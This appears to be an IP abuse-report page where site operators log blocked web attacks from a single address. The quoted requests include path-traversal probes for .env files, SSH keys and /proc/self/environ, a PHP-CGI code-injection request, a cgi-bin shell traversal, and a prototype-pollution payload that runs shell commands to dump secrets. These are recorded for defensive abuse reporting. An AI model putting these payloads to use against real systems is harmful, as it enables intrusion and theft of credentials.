๐ฌ๐ง
openstrike.co.uk
2026-10-09 05:14:54
(1 day ago)
147 attacks on password/key grabbing URLs, env grabbing URLs (type 2), config grabbing URLs (type 2) ...
show more
147 attacks on password/key grabbing URLs, env grabbing URLs (type 2), config grabbing URLs (type 2), VC URLs, PHP URLs, directory traversals, env grabbing URLs, shell probes:
GET /__vite_rsc_findSourceMapURL?filename=file:///root/.ssh/id_rsa&environmentName=rsc HTTP/1.1
GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/proc/self/environ HTTP/1.1
GET /secrets.yml HTTP/1.1
GET /.git/HEAD HTTP/1.1
POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp://input HTTP/1.1
GET /..%2f..%2f.env HTTP/1.1
GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/.env HTTP/1.1
POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
show less
Hacking
Web App Attack
๐จ๐ญ
๐จ๐ญ Hosting
2026-10-09 05:10:38
(1 day ago)
Automated WAF report: 125-150 blocked requests from this IP detected by our WAF.
Bad Web Bot
Web App Attack
๐ง๐ช
taivas.nl
2026-10-09 04:32:50
(1 day ago)
Many_bad_calls
Web App Attack
๐ฉ๐ช
findlab
2026-10-09 04:00:01
(1 day ago)
Backdrop CMS module - malicious activity detected
Bad Web Bot
Web App Attack
๐บ๐ธ
creechy
2026-10-09 03:09:59
(1 day ago)
136.86.134.68 - - [08/Oct/2026:20:09:50 -0700] "GET /src/.env HTTP/1.1" 404 764 "-" "Mozilla/5.0 (co ...
show more
136.86.134.68 - - [08/Oct/2026:20:09:50 -0700] "GET /src/.env HTTP/1.1" 404 764 "-" "Mozilla/5.0 (compatible; Meta-ExternalAgent/1.0; +https://developers.facebook.com/docs/sharing/webmasters/crawler)"
...
show less
Hacking
Bad Web Bot
๐บ๐ธ
TPI-Abuse
2026-10-09 02:32:04
(1 day ago)
(mod_security) mod_security (id:210730) triggered by 136.86.134.68 (68.134.86.136.bc.googleuserconte ...
show more
(mod_security) mod_security (id:210730) triggered by 136.86.134.68 (68.134.86.136.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Oct 08 22:32:00.245014 2026] [security2:error] [pid 11457:tid 11457] [client 136.86.134.68:55268] ModSecurity: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||shhcenter.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "shhcenter.com"] [uri "/z9x8c7v6b5-debug-trigger-shhcenter.com"] [unique_id "ashSIHzeesyX9F7t-Xk-TgAAAAc"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐ซ๐ท
โจ
2026-10-09 02:17:12
(1 day ago)
Domain : sherriedemorrow.co.uk
Rule : hack
2026-10-09 02:15:28 ***hidden-privacy*** GET /proc/self/c ...
show more
Domain : sherriedemorrow.co.uk
Rule : hack
2026-10-09 02:15:28 ***hidden-privacy*** GET /proc/self/cgroup - 443 - 136.86.134.68 HTTP/2 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ChatGPT-User/1.0; https://openai.com/bot - sherriedemorrow.co.uk 404 0 2 12892 441 136 - -
show less
Hacking
SQL Injection
Brute-Force
๐บ๐ธ
mnsf
2026-10-09 02:05:20
(1 day ago)
Scanning/Probing (13)
Brute-Force
Web App Attack
๐ซ๐ท
dynamix
2026-10-09 01:39:02
(1 day ago)
Multiple WAF Violations
Web App Attack
๐ณ๐ฑ
WeCloudit-Anti-Abuse
2026-10-09 01:35:41
(1 day ago)
This IP was detected by CrowdSec triggering crowdsecurity/http-probing
Web App Attack
Hacking
๐จ๐ญ
copestack
2026-10-09 01:30:08
(1 day ago)
Honeypot hit on ov-4e5936 (fail2ban jail: nginx-compat)
Web App Attack
๐บ๐ธ
TPI-Abuse
2026-10-09 01:24:38
(1 day ago)
(mod_security) mod_security (id:210730) triggered by 136.86.134.68 (68.134.86.136.bc.googleuserconte ...
show more
(mod_security) mod_security (id:210730) triggered by 136.86.134.68 (68.134.86.136.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Oct 08 21:24:31.745705 2026] [security2:error] [pid 32509:tid 32509] [client 136.86.134.68:36460] ModSecurity: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||shelbynash.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "shelbynash.com"] [uri "/z9x8c7v6b5-debug-trigger-shelbynash.com"] [unique_id "ashCTymwdKqSh-RArHMxdQAAAAs"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐ซ๐ท
masterguru
2026-10-09 01:15:57
(1 day ago)
BAD BOT - Detected and Blocked.. Matched phrase "baidu" at REQUEST_HEADERS:User-Agent. (1100000-193)
Bad Web Bot
๐บ๐ธ
TPI-Abuse
2026-10-09 00:48:46
(1 day ago)
(mod_security) mod_security (id:210730) triggered by 136.86.134.68 (68.134.86.136.bc.googleuserconte ...
show more
(mod_security) mod_security (id:210730) triggered by 136.86.134.68 (68.134.86.136.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Oct 08 20:48:42.878379 2026] [security2:error] [pid 31693:tid 31693] [client 136.86.134.68:56168] ModSecurity: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "4"] [msg "COMODO WAF: URL file extension is restricted by policy||sheamar.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "sheamar.com"] [uri "/z9x8c7v6b5-debug-trigger-sheamar.com"] [unique_id "asg56iz_dfAJAs3cKzZt5gAAAAg"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐ฉ๐ช
sdos.es
2026-10-09 00:47:04
(1 day ago)
"OS File Access Attempt - Matched Data: proc/self/environ found within ARGS:0: {\x22then\x22:\x22$1: ...
show more
"OS File Access Attempt - Matched Data: proc/self/environ found within ARGS:0: {\x22then\x22:\x22$1:__proto__:then\x22,\x22status\x22:\x22resolved_model\x22,\x22reason\x22:-1,\x22value\x22:\x22{/\x22then/\x22:/\x22$b1337/\x22}\x22,\x22_response\x22:{\x22_prefix\x22:\x22process.mainmodule.require('child_process').execsync('env 2>/dev/null || cat /proc/self/environ 2>/dev/null');\x22,\x22_formdata\x22:{\x22get\x22:\x22$1:constructor:constructor\x22}}}"
show less
Web App Attack